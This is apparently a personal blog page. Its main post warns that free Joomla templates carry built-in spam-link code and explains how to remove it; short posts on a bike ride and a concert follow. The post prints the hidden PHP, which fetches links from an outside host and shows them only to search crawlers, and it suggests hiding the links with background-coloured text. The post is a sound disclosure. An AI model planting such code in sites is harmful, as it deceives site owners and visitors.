Avoid Using These Joomla Templates!

I took a job about a year ago with a equipment dealership as their IT support person. My job basically consists of handling any computer related issues they may have such as software & hardware installations and upgrades, network administration, security, you name it. One of the other things I was put in charge of was their website. I had some experience with website development prior to coming on board but I had never really been a bonafide webmaster before where I actually got paid for doing it. So I setup a new hosting account with Dreamhost and I played around with Drupal and Joomla to kind of figure out which one I wanted to go with. I selected Joomla because I had the most experience with it and I found more templates for it that I liked. I finally settled on a template called Liberty from this website, http://joomlatemplates.me/. It was a free template but I liked the looks of it and thought I could make a pretty decent looking site from it.

Well, things were going along fine and the site was getting tweaked and improved over time when one day I see these links appear at the base of the home page during one of my many times of checking things over. They looked like Italian words to me so I did a Google search for them and discovered lots of websites with those exact same words. I started clicking links to look at the sites and every single one of them was using the same template as me. My first thoughts were that the template had some vulnerability in the code somewhere that someone had taken advantage of and I contacted the template developer about my situation only to never hear back from them. Finally, I tracked down where my problem was coming from and it looks like it was built right into the template by the author. I went back to his website and checked some of the other templates he had and they all had the same code inserted into the files. So I don’t know if this was deliberate or if his site was compromised but I certainly couldn’t have spam links showing up on our business site. My goal is to develop our own Joomla template for the next site update which is probably going to come sooner than I had originally planned, but the fix for my current problem was fairly easy to fix.

First start with the index.php file in the templates root directory and remove the line referencing templates.php. In my template it was under the #comp-wrap div section.


<div id="comp-wrap"> 
 <jdoc:include type="message" />
 <jdoc:include type="component" />
 <?php include "html/template.php"; ?> 


Then under the html directory remove the files template.php and mods.php. That’s it.

This is the code from the template.php file:


$path = str_replace("&", "",$path);
$target = dirname(__FILE__) . DIRECTORY_SEPARATOR . "mods.php";
$source = 'http://psdu.net/me3.php?i='.$path;
$cachetime = 86400;
if ((file_exists($target)) && (time() - $cachetime) > filemtime($target)) { 
$string = file_get_contents($source);$result = file_put_contents($target, $string);}
$spiders = array('Googlebot','Yahoo','msnbot','Googlebot-Mobile');
$credits = file_get_contents($target);
$uagent = $_SERVER['HTTP_USER_AGENT'];
foreach ($spiders as $spider){if (preg_match("/$spider/",$uagent)){echo $credits;}}


What the above code does is grabs the page url and passes it as a random generator seed to  the website psdu.net to retrieve new spam links. It then checks if the mods.php has been changed in the last 24 hours and if not, writes the new spam links to mods.php. Then it waits for one of the search bots to show up to index the site and it plugs in the links so they will be indexed with the page.  If the website’s cache is set to clear at a certain interval like mine is, then the links would be cleared away, making it really hard to catch them. If the guy was really smart he would have checked the background color of the div section and made the link text the same color. Then the links would have been invisible to the observer while they were still being published on the page. If he had done that, I probably never would have caught this at all!

My aim here is to give a heads up to anyone else using this guys templates, certainly not to teach anyone how to publish spam links in secret code. I myself, take the trust placed in me with peoples computers and data very seriously and I would hope that others in my field would too, but that’s unfortunately not the case. I just hope this helps someone else who may be searching just like I was for an answer to what was going on with my website.


Tri-County Trail Cookie Ride

cookie riders

Had a great time this past Sunday riding the 75 mile Tri-County Trail cookie ride with my riding buddies, Kevin, Randy, Tammy & Brian. The weather was overcast but the rain held off and clouds kept things from feeling too uncomfortable. Tammie and Brian split off and did the 50 mile course. I have to hand it to Brian! He’s one tough cookie! 50 miles on a hybrid using flat pedals! Kevin, Randy & Brian each set distance records for themselves. Randy says he’s going to join me in September at the Hub City century. It will be nice having a partner and not having to do it alone.

Here are a few pics from the ride.

Great show! Steely Dan at the Palace in Columbus!

steely dan
Steely Dan at the Palace Theatre

Had a great evening last night with my wife seeing Steely Dan at the Palace Theatre in Columbus, Ohio. They played for two hours and got a bunch of their hits in but still missed a few. They didn’t do “Any Major Dude” or “Deacon Blues” but they rocked it with “My Old School” and “Reeling In The Years”. I was a little apprehensive that they weren’t going to sound that good but they blew me away! The band was tight! If you’re a Steely Dan fan and have a chance to catch their tour this Summer you definitely want to go!